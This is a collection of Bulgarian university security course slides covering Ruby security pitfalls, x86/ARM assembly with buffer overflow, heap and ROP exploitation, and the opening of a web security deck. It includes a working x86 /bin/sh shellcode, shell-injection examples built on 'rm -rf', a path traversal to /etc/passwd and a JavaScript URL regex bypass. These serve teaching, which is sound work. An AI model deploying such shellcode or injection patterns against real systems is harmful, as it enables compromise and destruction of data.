 85 |             <p class="fragment">Ако когато се върнете, все още имате желание да дефинирате глобална променлива, прочетете (отново) тази статия:</p>
 86 |             <p class="fragment">http://c2.com/cgi/wiki?GlobalVariablesAreBad</p>
 87 |           </section>
 88 |         </section>
 89 | 
 90 |         <section>
 91 |           <h2>Низове</h2>
 92 |           <p class="fragment">Литералите за низ в Ruby са единични и двойни кавички</p>
 93 |           <pre class="fragment"><code class="language-ruby">'Васил „не“ пие' # <--- Низ :)</code></pre>
 94 |           <p class="fragment">UTF-8 кодирани, но част от операциите върху тях действат само върху ASCII символите им:</p>
 95 |           <pre class="fragment"><code class="language-ruby">"Васил „не“ pie".upcase
 96 | #=> "Васил „не“ PIE"</code></pre>
 97 |         </section>
 98 | 
 99 |         <section>
100 |           <p>Създаването на низ с двойни кавички предоставя интерполация</p>
101 |           <pre class="fragment"><code class="language-ruby">"1 + 2 = #{1 + 2}"
102 | #=> "1 + 2 = 3"</code></pre>
103 |         </section>
104 | 
105 |         <section>
106 |           <h2>Символи</h2>
107 |           <p class="fragment">Интернирани низове от символи</p>
108 |           <p class="fragment">Интернирани?</p>
109 |           <p><span class="fragment">Immutable</span><span class="fragment">, всяка уникална стойност остава в паметта до приключване на изпълнението</span><span class="fragment">. Използват се например за ключове за хешове</span><span class="fragment"> и за други работи :).</span></p>
110 |           <pre class="fragment"><code>animal = :crocodile
111 | animals[animal] = Vasil.new
112 | animals[:crocodile]
113 | #=> #&lt;Vasil:0x007fb7f049d180&gt;
114 | 
115 | :crocodile.object_id
116 | #=> 1390428
117 | 
118 | animal.object_id
119 | #=> 1390428</code></pre>
120 |         </section>
121 | 
122 |         <section>
123 |           <h2>Класове и методи</h2>
124 |           <p class="fragment">Клас се дефинира така:</p>
125 |           <pre class="fragment"><code class="language-ruby">class Vasil
126 | end</code></pre>
127 | 
128 |           <p class="fragment">Метод се дефинира така:</p>
129 |           <pre class="fragment"><code class="language-ruby">class Vasil
130 |   def doesnt_drink?
131 |     false
132 |   end
133 | end</code></pre>
134 | 
135 |         </section>
136 | 
137 |         <section>
138 |           <h1>Опасните неща</h1>
139 |         </section>
140 | 
141 |         <section>
142 |           <h2>Препълване на паметта</h2>
143 |           <p class="fragment">Преди Ruby 2.2.0 всички символи остават в паметта до приключване на изпълнението на програмата.</p>
144 |           <p class="fragment">Това означава, че ако уникални символи се създават от потребителски данни, приложението може да препълни паметта на машината, на която работи.</p>
145 |           <p class="fragment">След 2.2.0 динамично създадените символи се освобождават от garbage collection процеса.</p>
146 |         </section>
147 | 
148 |         <section>
149 |           <p>В Ruby (почти) всичко може да бъде променено по време на изпълнение</p>
150 |           <p class="fragment">Под почти всичко да се разбира, че дори константите могат да бъдат променяни</p>
151 |           <pre class="fragment"><code class="language-ruby">VASIL_DOESNT_DRINK = false
152 | VASIL_DOESNT_DRINK = "true"
153 | # warning: already initialized constant VASIL_DOESNT_DRINK
154 | # warning: previous definition of VASIL_DOESNT_DRINK was here
155 | VASIL_DOESNT_DRINK
156 | => "true"</code></pre>
157 |         </section>
158 | 
159 |         <section>
160 |           <h2>Изводи</h2>
161 |           <p class="fragment">Програмистите трябва да внимават да не променят неочаквано нещо...<span class="fragment"> Което не е толкова трудно, ако програмистите спазват конвенциите.</span></p>
162 |         </section>
163 | 
164 |         <section>
165 |           <h2>Метапрограмиране</h2>
166 |           <ul class="fragment">
167 |             <li><code>eval</code></li>
168 |             <li><code>instance_eval</code></li>
169 |             <li><code>class_eval</code></li>
170 |             <li><code>module_eval</code></li>
171 |           </ul>
172 |           <p class="fragment">До тези методи никога не трябва да достигат данни под контрола на потребителите.</p>
173 |         </section>
174 | 
175 |         <section>
176 |           <h2>Динамично извикване на методи</h2>
177 |           <ul>
178 |             <li><code>Object#send</code> (извиква дори private методи)</li>
179 |             <li><code>Object#respond_to?</code></li>
180 |           </ul>
181 |           <p class="fragment">Отново, ако аргументите на тези методи са под контрола на потребителите, you're gonna have a bad time.</p>
182 |         </section>
183 | 
184 |         <section>
185 |           <section>
186 |             <h2>Good old shell injection</h2>
187 |             <ul class="fragment">
188 |               <li><code>Kernel#system</code></li>
189 |               <li><code>Kernel#exec</code></li>
190 |               <li><code>Kernel#syscall</code></li>
191 |               <li><code>%x(foo)</code></li>
192 |               <li><code>`foo`</code></li>
193 |             </ul>
194 |             <p class="fragment">Параметрите на тези команди винаги трябва да бъдат екранирани, ако са под контрола на потребителите</p>
195 |           </section>
196 |           <section>
197 |             <p>Защо?</p>
198 |             <pre class="fragment"><code class="language-ruby">system("rf -rf #{params[:file]}")</code></pre>
199 |             <pre class="fragment"><code class="language-ruby">exec(params[:command])</pre></code>
200 |             <pre class="fragment"><code class="language-ruby">`unlink #{params[:something]}`</code></pre>
201 |             <p class="fragment">Нека преди изпълнение на горните команди, сме дефинирали тази променлива:</p>
202 |             <pre class="fragment"><code class="language-ruby">params = {file: '/home/vasil',
203 |        command: 'rm -rf /home/vasil',
204 |      something: '/home/vasil/Desktop/passwords.txt'}
205 | </code></pre>
206 | 
207 |           </section>
208 |         </section>
209 | 
210 |         <section>
211 |           <h2>Операции с файлове</h2>
212 |           <p class="fragment"><code>Dir</code>, <code>File</code>, <code>IO</code>, <code>Kernel</code>, <code>Net::FTP</code>, <code>Net::HTTP</code>, <code>PStore</code>, <code>Pathname</code>, <code>Shell</code> и т.н.</p>
213 |           <p class="fragment">Препоръчително е имената на файловете/директориите да не бъдат под контрола на потребителите ИЛИ да бъдат екранирани по правилния начин</p>
214 |           <p class="fragment">А не така:</p>
215 |           <pre class="fragment"><code class="language-ruby">File.read "/home/application/upload/#{params[:file]}"</code></pre>
216 |           <pre class="fragment"><code class="language-ruby">File.read '/home/application/upload/../../../etc/passwd'</code></pre>
217 |         </section>
218 | 
219 |         <section>
220 |           <section>
221 |             <h2>Регулярни изрази</h2>
222 |             <p class="fragment">Като навсякъде другаде, с едно доста важно изключение</p>
223 |             <p class="fragment">За начало и край на низ не се използват <code>^</code> и <code>$</code>.</p>
224 |             <p class="fragment">Използват се <code>\A</code> и <code>\z</code>.</p>
225 |           </section>
226 |           <section>
227 |             <p>Какво става, ако се объркаме?</p>
228 |             <p class="fragment">Този регулярен израз:</p>
229 |             <pre class="fragment"><code class="language-ruby">/^https?:\/\/[^\n]+$/i</code></pre>
230 |             <p class="fragment">Ще разпознае този низ от символи:</p>
231 |             <pre class="fragment"><code>javascript:exploit_code();/*
232 | http://hi.com
233 | */</code></pre>
234 |             <p class="fragment">Повече за този вид атаки по-нататък в курса.</p>
235 |           </section>
236 |         </section>
237 |         <section>
238 |           <h2>Паралелно програмиране</h2>
239 |           <p><span class="fragment">MRI има global interpreter lock.</span> <span class="fragment">Други имплементации на Ruby нямат.</span></p>
240 |           <p class="fragment">С изключение на това, особеностите на паралелното програмиране с Ruby са стандартни.</p>
241 |         </section>
242 | 
243 |         <section>
244 |           <h2>Уязвимости на стандартната библиотека и runtime-а</h2>
245 |           <p class="fragment">MRI е написан на C</p>
246 |           <p class="fragment">Rubinius е написан на C++</p>
247 |           <p class="fragment">Съществуват редица имплементации на Ruby.</p>
248 |           <p class="fragment">Следете уязвимостите, асоциирани с имплементацията, която използвате.</p>
249 |         </section>
250 | 
251 |         <section>
252 |           <h2>Уязвимости на използваните от програмата библиотеки</h2>
253 |           <p class="fragment">Всеки може да пише джемове за Ruby.</p>
254 |           <p class="fragment">Не всеки може да пише джемове, които нямат дупки в сигурността.</p>
255 |           <p class="fragment">Rubygems има функционалност за подписване на пакети, но тя масово не се ползва.</p>
256 |           <p class="fragment">Доскоро пакетите се трансферираха по HTTP.</p>
257 |         </section>
258 |         <section>
259 |           <h1>Заключение</h1>
260 |           <p class="fragment">Следвайте конвенциите.</p>
261 |           <p class="fragment">Екранирайте входящите данни.</p>
262 |           <p class="fragment">Следете уязвимостите на платформата си.</p>
263 |         </section>
264 |         <section data-background="crock.jpg" data-state="middle">
265 |         </section>
266 |       </div>
267 | 
268 |     </div>
269 | 
270 |     <script src="lib/js/head.min.js"></script>
271 |     <script src="js/reveal.js"></script>
272 | 
273 |     <script>
274 | 
275 |      // Full list of configuration options available at:
276 |      // https://github.com/hakimel/reveal.js#configuration
277 |      Reveal.initialize({
278 |        controls: false,
279 |        progress: true,
280 |        history: true,
281 |        center: true,
282 | 
283 |        transition: 'slide', // none/fade/slide/convex/concave/zoom
284 | 
285 |        // Optional reveal.js plugins
286 |        dependencies: [
287 |          { src: 'lib/js/classList.js', condition: function() { return !document.body.classList; } },
288 |          { src: 'plugin/markdown/marked.js', condition: function() { return !!document.querySelector( '[data-markdown]' ); } },
289 |          { src: 'plugin/markdown/markdown.js', condition: function() { return !!document.querySelector( '[data-markdown]' ); } },
290 |          { src: 'plugin/highlight/highlight.js', async: true, condition: function() { return !!document.querySelector( 'pre code' ); }, callback: function() { hljs.initHighlightingOnLoad(); } },
291 |          { src: 'plugin/zoom-js/zoom.js', async: true },
292 |          { src: 'plugin/notes/notes.js', async: true }
293 |        ]
294 |      });
295 | 
296 |     </script>
297 | 
298 |   </body>
299 | </html>
300 | 


--------------------------------------------------------------------------------
/lecture-plans/vk/20arch.pandoc:
--------------------------------------------------------------------------------
  1 | % x86 и ARM
  2 | % Архитектури, асемблер, exploit-и
  3 | % Vasil Kolev \<vasil@ludost.net\>
  4 | 
  5 | # Основи на архитектурите
  6 | ## Основни
  7 | ### Описание
  8 | 
  9 | * Преди да говорим за атаки на компилируеми езици, трябва да си изясним архитектурата отдолу
 10 | * Ще говорим за x86 и ARM
 11 | * Идеалната книга за целта - Reverse Engineering for Beginners
 12 |     * http://beginners.re
 13 | 
 14 | ### Endianness
 15 | 
 16 | ![endianness](endian.png)
 17 | 
 18 | ## x86
 19 | 
 20 | ###
 21 | #### x86/x86_64
 22 | 
 23 | ### x86
 24 | 
 25 | * Първи процесор - 8086, 1978 г.
 26 | * 16-битов, 32-битов (80386), 64-битов (x86_64, AMD64)
 27 |     * Да не се бърка с x64 (Itanium), който е съвсем различен
 28 | * Little-endian
 29 | * CISC
 30 | * Основна архитектура на сървъри и desktop-и
 31 |     * Мощни
 32 |     * backwards-compatible
 33 |     * В общи линии най-новите технологии се прилагат при тях
 34 | * Няколко производителя - Intel, AMD
 35 | 
 36 | 
 37 | ### Основни идеи
 38 | 
 39 | * Голям instruction set
 40 | * Може да оперирате директно с паметта
 41 | * Сложни инструкции
 42 |     * могат да отнемат по няколко такта
 43 | * Много много наследство от стари версии
 44 | 
 45 | ### Регистри
 46 | 
 47 | * General purpose - AX, BX, CX, DX (8-64bit)
 48 | * General purpose (64bit only) - R8-R15 (8-64bit)
 49 | * Segment registers - CS, DS, SS, ES, FS, GS (16bit)
 50 | * Pointer registers - SP, BP (8-64bit)
 51 |     * ползват се за стека
 52 | * Index registers - SI, DI
 53 |     * general purpose в x86_64
 54 | * Instruction pointer registers - IP
 55 | * Куп други за FPU, MMX, SSE...
 56 | 
 57 | ###
 58 | 
 59 | ![x86 регистри](registers.png)
 60 | 
 61 | ### Calling conventions, stack, heap
 62 | 
 63 | * Аргументите на функция се предават през стека
 64 |     * Има fastcall/regparm при 32битовите с няколко регистъра
 65 |     * x86_64 ползва 4 или 6 регистъра и след това стека
 66 | * Стекът е виртуална конструкция в паметта
 67 |     * RSP показва къде свършва
 68 |     * RBP показва къде започва текущия stack frame
 69 | * Heap-а е паметта, дадена на процеса за други нужди
 70 | 
 71 | ###
 72 | 
 73 | ![stack and heap](stackheap.png)
 74 | 
 75 | ###
 76 | 
 77 | ![stack frame](stackframe.png)
 78 | 
 79 | ###
 80 | 
 81 | ![stack frame-full](fullstackframe.png)
 82 | 
 83 | ### Memory protection
 84 | 
 85 | * Ще си говорим основно за protected mode
 86 | * ring 0, ring 3
 87 | * Виртуална и физическа памет
 88 | 
 89 | ## ARM
 90 | 
 91 | ###
 92 | #### ARM
 93 | 
 94 | ### ARM
 95 | 
 96 | * Първи процесор - ARMv2, 1985 г.
 97 | * 32 битов, 64 битов (съвсем скоро, ARMv8)
 98 | * RISC
 99 | * Може да превключва м/у little и big endian
100 | * Основна архитектура на повечето мобилни устройства
101 |     * Евтини
102 |     * Ниско потребление на енергия
103 |     * Прости
104 | * Много производители (ARM само лицензират архитектурата)
105 | 
106 | ### Регистри, 32 bit
107 | 
108 | * 16 бр. 32-битови регистъра, R0-R15
109 | * R0 - return result
110 | * R1-R12 - general purpose
111 | * R13 - stack pointer
112 | * R14 - link register
113 | * R15 - program counter
114 | * CPSR - Current Program State Register
115 | 
116 | ### Регистри, 64bit
117 | 
118 | * SP, PC са отделни регистри
119 | * 32 бр. 64-битови регистъра, X0-X31
120 | * X0 - return result
121 | * X1-X7 - function arguments
122 | * X8-X28 - general purpose
123 | * X29 - frame pointer (GCC)
124 | * X30 - link register
125 | * X31 или XZR - always zero
126 | * Долната 32битова част е достъпна чрез W регистър
127 |    * като RAX/EAX в x86
128 | * По принцип приложението им е конвенция, не е enforce-нато от нещо
129 | 
130 | ### Режими
131 | 
132 | * ARM може да обработва инструкциите в няколко режима
133 | * ARM mode - 32 бита, aligned
134 | * THUMB - 16 бита за инструкция, aligned
135 | * THUMB2 - 16/32 бита за инструкция
136 | * Jazelle - Java bytecode
137 | * Режимите може да се превключват
138 |     * доста полезно при писане на return-oriented shellcode
139 | 
140 | ### Calling convention
141 | 
142 | * LR - link register (R14/X30) съхранява return адреса
143 | * На следващото повикване return address-а се запазва в стека
144 | 
145 | # Асемблер
146 | 
147 | ## Синтаксис
148 | 
149 | ###
150 | #### Асемблер
151 | 
152 | ### Синтаксиси
153 | 
154 | * Два - intel и AT&T
155 | * AT&T - gcc, unix-и
156 | * Intel - windows, visual studio
157 | 
158 | ### Intel
159 | 
160 | ~~~~~~~asm
161 | $SG2989 DB      'hello, world', 0AH, 00H
162 | 
163 | main    PROC
164 |         sub     rsp, 40
165 |         lea     rcx, OFFSET FLAT:$SG2923
166 |         call    printf
167 |         xor     eax, eax
168 |         add     rsp, 40
169 |         ret     0
170 | main    ENDP
171 | ~~~~~~~
172 | 
173 | ### AT&T
174 | 
175 | ~~~~~~~asm
176 | .LC0:
177 |         .string "hello, world\n"
178 | main:
179 |         pushl   %ebp
180 |         movl    %esp, %ebp
181 |         andl    $-16, %esp
182 |         subl    $16, %esp
183 |         movl    $.LC0, (%esp)
184 |         call    printf
185 |         movl    $0, %eax
186 |         leave
187 |         ret
188 | ~~~~~~~
189 | 
190 | 
191 | ### Основни разлики
192 | 
193 | * АT&Т: $16 == intel: 10h
194 | * a=b: AT&T: mov b, a == intel: mov a, b
195 | * В AT&T има суфикс на инструкциите за размера на операнда (q,l,w,b)
196 | * В AT&T се слага % преди името на регистъра
197 | 
198 | ## инструкции
199 | 
200 | ###
201 | #### Инструкции/x86
202 | 
203 | ### Основни
204 | 
205 | * MOV/MOVSX/MOVZX
206 | * NOP
207 |     * AND EAX,EAX и други вариации
208 | * INT, SYSCALL (x86_64)
209 | 
210 | ### Аритметика
211 | 
212 | * ADD/ADC/INC (add, add with carry, increment)
213 | * SUB/SBB
214 | * MUL/IMUL
215 | * DIV/IDIV
216 | * SHL/SHR
217 | * XCHG
218 | 
219 | ### Логически
220 | 
221 | * AND, OR, XOR
222 | * NOT
223 | 
224 | ### Branching
225 | 
226 | * CMP, TEST
227 | * JMP
228 | * Jcc
229 |     * JE, JNE
230 |     * JZ, JNZ
231 |     * и много много други
232 | 
233 | ### Stack
234 | 
235 | * PUSH X
236 |      * movl X, (%esp)
237 |      * subl $4, %esp
238 | * POP X
239 |      * movl (%esp), X
240 |      * addl $4, %esp
241 | 
242 | ###
243 | #### Инструкции/ARM
244 | 
245 | ### Основни
246 | 
247 | * Повечето инструкции работят само с регистри
248 | * LDRB, LDRH, LDRW
249 | * STRB, STRH, STRW
250 | * SWC
251 | 
252 | ### Предикати на инструкции
253 | 
254 | * Почти всяка инструкция може да има условие за изпълнение
255 | 
256 | ~~~~~~C
257 |     while (i != j)
258 |     {
259 |        if (i > j)
260 |        {
261 |            i -= j;
262 |        }
263 |        else  /* i < j (since i != j in while condition) */
264 |        {
265 |            j -= i;
266 |        }
267 |     }
268 | ~~~~~~
269 | 
270 | ### Предикати на инструкции - асемблер
271 | 
272 | ~~~~~~asm
273 | loop: CMP  Ri, Rj        ; set condition "NE" if (i != j),
274 |                          ;               "GT" if (i > j),
275 |                          ;            or "LT" if (i < j)
276 |       SUBGT  Ri, Ri, Rj  ; if "GT" (Greater Than), i = i-j;
277 |       SUBLT  Rj, Rj, Ri  ; if "LT" (Less Than), j = j-i;
278 |       BNE  loop          ; if "NE" (Not Equal), then loop
279 | ~~~~~~
280 | 
281 | 
282 | ### Branching
283 | 
284 | * CMP, CMN, TST, TEQ
285 | * B - branch
286 | * BL - branch with link
287 | * BLX - branch with link and exchange
288 |      * сменя режима на процесора
289 | * BXJ - сменя до Jazelle mode
290 | 
291 | ### Flag set suffix
292 | 
293 | * Ако добавим S към инструкция, тя update-ва флаговете
294 | * ADDS, SUBS...
295 | * т.е. можем да ползваме *S вместо CMP от време на време
296 |      * като има страничен ефект, не само проверка
297 | 
298 | ### Смяна на режими
299 | 
300 | * Всъщност, всяка инструкция, която зарежда PC (R15 в arm32) сменя режима
301 | * Гледа се най-младшия бит
302 | * ADC, ADD, AND, ASR, BIC, EOR, LSL, LSR, MOV, MVN,
303 | * ORR, ROR, RRX, RSB, RSC, SBC, SUB.
304 | 
305 | 
306 | ## Изводи
307 | ###
308 | #### Изводи
309 | 
310 | * x86 асемблерът е огромен
311 | * arm е доста по-изчистен и гъвкав
312 | * и двата не са особено прости
313 | * и двата дават много възможности
314 | 
315 | # Buffer overflow exploitation
316 | 
317 | ## Анатомия на exploit-ването
318 | 
319 | ###
320 | #### Основи на exploit-ите
321 | 
322 | ### Цел
323 | 
324 | * Да накараме програмата да направи това, което искаме
325 | * или чрез атака на логиката и
326 | * или чрез това да изпълни наш код
327 | 
328 | ### Payload & execution
329 | 
330 | * В общи линии две цели:
331 |      * Да качим нашия payload (shellcode)
332 |      * Да го изпълним
333 | 
334 | ### Payload storage
335 | 
336 | * Най-тривиално - да накараме програмата да го изтегли сама
337 |      * allow_url_fopen() в php например :)
338 | * Средата на програмата
339 |      * environment variables
340 |      * arguments
341 | * Данни, които ние подаваме
342 | * Или вече съществуващ код, който може да ни върши работа
343 |      * както ще видим в Return-to-libc
344 | 
345 | ### Execution
346 | 
347 | * Промяна на адрес, който ще се изпълни
348 |      * stack return address
349 |      * PLT
350 |      * всякакви указатели към функции
351 | * Подмяна на функция
352 | * Директно изпълнение
353 | 
354 | ## Stack overflow
355 | 
356 | ###
357 | #### Stack overflows
358 | 
359 | ### Кратко обяснение
360 | 
361 | * Презаписваме променлива с по-голям размер
362 | * Презаписваме return address-а с наш
363 | * На тоя адрес има наш код
364 | * Адресът може да е в стека или някъде другаде
365 | 
366 | ### Примерен код
367 | 
368 | ~~~~~~C
369 | #include <string.h>
370 |  
371 | void foo (char *bar)
372 | {
373 |    char  c[12];
374 |  
375 |    strcpy(c, bar);  // no bounds checking
376 | }
377 |  
378 | int main (int argc, char **argv)
379 | {
380 |    foo(argv[1]);
381 | }
382 | ~~~~~~
383 | 
384 | ###
385 | 
386 | ![overflow](overflow.png)
387 | 
388 | ### Анатомия на shellcode при stack overflow
389 | 
390 | * NOP sled
391 | * Code
392 | * Return address
393 | 
394 | ### Особености на кода
395 | 
396 | * Printable characters
397 | * ... или поне не може да съдържа \\0, понеже се минава през string функции
398 | * Честа употреба на отрицателни числа или странни константи
399 | 
400 | ### execve()
401 | 
402 | ~~~~~~C
403 | int execve(const char *filename, char *const argv[],
404 |                   char *const envp[]);
405 | ~~~~~~
406 | 
407 | * EAX - syscall number (11)
408 | * EBX - filename
409 | * ECX - argv[]
410 | * EDX - envp[]
411 | * regparam=4 calling convention
412 | 
413 | ### C код
414 | 
415 | ~~~~~~C
416 | char *filename="//bin/sh";
417 | char *argv[2];
418 | 
419 | argv[0]=filename;
420 | argv[1]=NULL;
421 | 
422 | execve(filename, argv, NULL);
423 | ~~~~~~
424 | 
425 | ### Shellcode на assembly
426 | 
427 | ~~~~~~asm
428 | section .text
429 | _start:
430 | xor eax, eax    ; EAX=0
431 | push eax        ; push 0 in the stack
432 | push 0x68732f6e ; PUSH //bin/sh in reverse i.e. hs/nib//
433 | push 0x69622f2f
434 | mov ebx, esp    ; Make EBX point to //bin/sh using ESP
435 | push eax        ; PUSH 0x00000000 using EAX 
436 | mov edx, esp    ; and point EDX to it using ESP
437 | push ebx        ; PUSH address of //bin/sh on the Stack
438 | mov ecx, esp    ; and make ECX point to it using ESP
439 | mov al, 11      ; move 11 into AL to avoid nulls
440 | int 0x80 
441 | ~~~~~~
442 | 
443 | ### Стекът след изпълнението на кода
444 | 
445 | ![setupstack](setupstack.png)
446 | 
447 | ### Return address
448 | 
449 | * В най-простия случай - не се променя и е в стека
450 |     * Това не работи от години
451 | * Налучкване
452 |     * При достатъчно голям NOP sled не е толкова трудно
453 | * Друг hack
454 |     * Имаме някъде наблизо адрес на контролирана от нас памет
455 |     * Environment variable
456 |     * Command-line argument
457 | * Return-oriented programming
458 |     * след малко :)
459 | 
460 | ## Heap overflow
461 | 
462 | ###
463 | #### Heap overflow
464 | 
465 | ### Heap overflow
466 | 
467 | * Целим да презапишем указател към функция
468 |     * или нещо подобно
469 | * Целим да объркаме memory allocator-а
470 | 
471 | ### Memory allocator
472 | 
473 | * malloc()/free()
474 | * заделят памет в heap-а
475 | * поддържат структура със заделените парчета
476 | 
477 | ### Нов attack vector - PLT
478 | 
479 | * Procedural linkage table
480 | * Адреси на различни функции
481 | * free(), malloc(), strcpy()...
482 | * Адресът е сравнително ясен
483 | * Ако можем да пишем там, можем да насочим изпълнението на някоя функция към наш код
484 | 
485 | ### Работа на free()
486 | 
487 | ~~~~~~C
488 | struct chunk {
489 |         int prev_size;
490 |         int size;
491 |         struct chunk *fd;
492 |         struct chunk *bk;
493 | };
494 | ~~~~~~
495 | * някъде в кода на free() има
496 | 
497 | ~~~~~~C
498 |   bck = p->bk;
499 |   fwd = p->fd;
500 |   fwd->bk = bck;
501 |   bck->fd = fwd;
502 | ~~~~~~
503 | 
504 | ###
505 | 
506 | ![memalloc](memalloc.png)
507 | 
508 | ### Exploit
509 | 
510 | * презаписваме bk и fd
511 | * ако подадем bk=A и fd=B, можем да постигнем \*(A+12) = B и \*(B+8) = A.
512 | * ... и просто можем да запишем в PLT на мястото на следващата извиквана функция някой наш адрес
513 | 
514 | # Return-oriented programming
515 | 
516 | ## Идея
517 | 
518 | ###
519 | #### Return-oriented programming
520 | 
521 | ### Идея
522 | 
523 | * Поредица от return адреси в кода на програмата, които се връщат при нас
524 | * Парчета код, които са използваеми (gadgets)
525 |      * Намиращи се на фиксирани позиции
526 | * Много полезно в cisco IOS и други
527 | 
528 | ## Return-into-libc
529 | 
530 | ### Return-into-libc
531 | 
532 | * Най-простия пример за подобно нещо
533 | * Гледаме да направим стек с аргументи и да идем на system()
534 | 
535 | ### Стек
536 | 
537 | ![stack frame](stackframe.png)
538 | 
539 | ### Какво ни трябва
540 | 
541 | * Адресът на system()
542 | * Адрес на string "/bin/sh"
543 | * За предпочитане е и в двата адреса да няма нулев байт
544 | 
545 | ###
546 | 
547 | ![returntolibc](returntolibc.png)
548 | 
549 | ## ROP chaining
550 | 
551 | ### ROP chaining
552 | 
553 | * Изпълняване на повече от една функция
554 | * С този return адрес можем да изпълним две
555 | * А ако искаме повече?
556 | 
557 | ### Gadgets
558 | 
559 | * Малки парчета код, които правят нещо
560 | * Завършват на ret
561 | * Могат да модифицират регистри или памет
562 | * Много трудно за писане на ръка, има компилатори
563 | * Много hack-ове като unalinged инструкции, смяна на режима
564 | 
565 | ## Tools
566 | 
567 | ### Инструменти
568 | 
569 | * IDA pro
570 | * objdump
571 | * Metasploit
572 | * ropgadgets
573 | 


--------------------------------------------------------------------------------
/presentations/web/index.html:
--------------------------------------------------------------------------------
  1 | <!doctype html>
  2 | <html lang="bg">
  3 | 
  4 |   <head>
  5 |     <meta charset="utf-8">
  6 | 
  7 |     <title>Web приложения – особености от гледна точка на сигурността</title>
  8 | 
  9 |     <meta name="apple-mobile-web-app-capable" content="yes" />
 10 |     <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent" />
 11 | 
 12 |     <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, minimal-ui">
 13 | 
 14 |     <link rel="stylesheet" href="css/reveal.css">
 15 |     <link rel="stylesheet" href="css/theme/white.css" id="theme">
 16 | 
 17 |     <!-- Code syntax highlighting -->
 18 |     <link rel="stylesheet" href="lib/css/tomorrow.css">
 19 | 
 20 |     <!-- Printing and PDF exports -->
 21 |     <script>
 22 |      var link = document.createElement( 'link' );
 23 |      link.rel = 'stylesheet';
 24 |      link.type = 'text/css';
 25 |      link.href = window.location.search.match( /print-pdf/gi ) ? 'css/print/pdf.css' : 'css/print/paper.css';
 26 |      document.getElementsByTagName( 'head' )[0].appendChild( link );
 27 |     </script>
 28 | 
 29 |     <!--[if lt IE 9]>
 30 |     <script src="lib/js/html5shiv.js"></script>
 31 |     <![endif]-->
 32 |   </head>
 33 | 
 34 |   <body>
 35 | 
 36 |     <div class="reveal">
 37 | 
 38 |       <!-- Any section element inside of this container is displayed as a slide -->
 39 |       <div class="slides">
 40 | 	<section>
 41 | 	  <h1>Web приложения</h1>
 42 | 	  <h3>Особености от гледна точка на сигурността</h3>
 43 | 	</section>
 44 | 
 45 | 	<section>
 46 | 	  <h2>Въведение</h2>
 47 |           <p>
 48 | 	    <span class="fragment">Уеб програмирането изисква интеграция на
 49 | 	      редица технологии.</span>
 50 |             <span class="fragment">Това означава, че
 51 | 	      уеб приложенията имат голяма повърхност за атака.</span>
 52 |             <span class="fragment">Както и голяма сложност, която води до
 53 |               непредвидени последствия.</span>
 54 |             <span class="fragment">В следствие на това, сигурността на стека е
 55 |               игра на котка и мишка.</span>
 56 |           </p>
 57 | 	</section>
 58 | 
 59 |         <section data-transition="none">
 60 |           <h2>Стекът</h2>
 61 | 
 62 |           <ul>
 63 |             <li class="fragment">HTML</li>
 64 |             <li class="fragment">CSS</li>
 65 |             <li class="fragment">Browser Scripting (JavaScript)</li>
 66 |             <li class="fragment">HTTP(s)</li>
 67 |             <li class="fragment">HTTP(s) Server</li>
 68 |             <li class="fragment">Server Side Scripting (PHP/Ruby/Python/etc.)</li>
 69 |             <li class="fragment">Database</li>
 70 |             <li class="fragment">OS</li>
 71 |             <li class="fragment">Hardware</li>
 72 |           </ul>
 73 |         </section>
 74 |         <section data-transition="none">
 75 |           <h2>Стекът</h2>
 76 | 
 77 |           <ul>
 78 |             <li>HTML</li>
 79 |             <li>CSS</li>
 80 |             <li>Browser Scripting (JavaScript)</li>
 81 |             <li>HTTP(s)</li>
 82 |             <li>HTTP(s) Server</li>
 83 |             <li>Server Side Scripting (PHP/Ruby/Python/etc.)</li>
 84 |             <li><strike>Database</strike></li>
 85 |             <li><strike>OS</strike></li>
 86 |             <li><strike>Hardware</strike></li>
 87 |           </ul>
 88 |         </section>
 89 | 
 90 |         <section>
 91 |           <h2>За какво още НЯМА да говорим</h2>
 92 | 
 93 |           <ul>
 94 |             <li class="fragment">Flash</li>
 95 |             <li class="fragment">Silverlight</li>
 96 |             <li class="fragment">ActiveX</li>
 97 |             <li class="fragment">Java в браузъра</li>
 98 |           </ul>
 99 | 
100 |           <p class="fragment">Тези технологии ще смятаме за безнадеждно несигурни.</p>
101 |           <p class="fragment">Не че това не може да се каже за Web програмирането като цяло :).</p>
102 |         </section>
103 | 
104 |         <section>
105 |           <section>
106 |             <h2>Remote Code Execution</h2>
107 |             <h1>a.k.a. Client Side Scripting</h1>
108 |           </section>
109 | 
110 |           <section>
111 |             <h2>Browser Scripting</h2>
112 |             <p class="fragment">Скриптирането на браузъра, посредством JS, е в същността си remote code execution.</p>
113 |             <p class="fragment">Функционалност срещу практичност</p>
114 |           </section>
115 | 
116 |           <section>
117 |             <h2>Но освен това</h2>
118 |             <p class="fragment">Липсва метод за подписване на JS, който е написан от разработчиците на уеб приложение.</p>
119 |             <p class="fragment">Липсва достатъчно подробна система от позволения (напр. Android).</p>
120 |             <p class="fragment">JS Sux (no offence)</p>
121 |           </section>
122 | 
123 |           <section>
124 |             <h2>Не може ли JS да се изведе от употреба?</h2>
125 |             <p>
126 |               <span class="fragment">Може!</span> <span class="fragment">Flash
127 |                 и Java applets са примери за client-side технологии, които излизат
128 |                 от употреба</span><span class="fragment">... и биват заместени от
129 |                 по-добра технология</span><span class="fragment">, която се казва JavaScript.</span>
130 |             </p>
131 |             <p class="fragment">:(</p>
132 |           </section>
133 |         </section>
134 | 
135 |         <section>
136 |           <section>
137 |             <h1>TLS</h1>
138 |             <p class="fragment">Още една технология, която няма алтернатива :(.</p>
139 |             <p class="fragment">Bulletproof SSL and TLS илюстрира добре проблемите и хаковете, които ги заобикалят.</p>
140 |             <p class="fragment">Ще се спрем на няколко проблема и хаковете, които ги заобикалят :).</p>
141 |           </section>
142 | 
143 |           <section>
144 |             <h1>PFS</h1>
145 |             <p class="fragment">Означава, че ако някой се сдобие с частния ключ
146 |             на TLS сървърите ви, няма да може да дешифрира данни, които са
147 |             подслушани преди това.</p>
148 |             <p class="fragment">Разчита на Ephemeral Diffie-Hellman обмяна на ключове.</p>
149 |           </section>
150 | 
151 |           <section>
152 |             <h2>Елиптични криви</h2>
153 |             <p class="fragment">Засега положението с елиптичните криви е малко проблематично.</p>
154 |             <p class="fragment">Има изгледи да се подобри.</p>
155 |             <p class="fragment">Адам Лангли смята, че имплементирането на бекдоор в елиптична крива е извънземна технология.</p>
156 | 
157 |             <p class="fragment">Т.е. може да се използва и EECDH за осигуряване на PFS.</p>
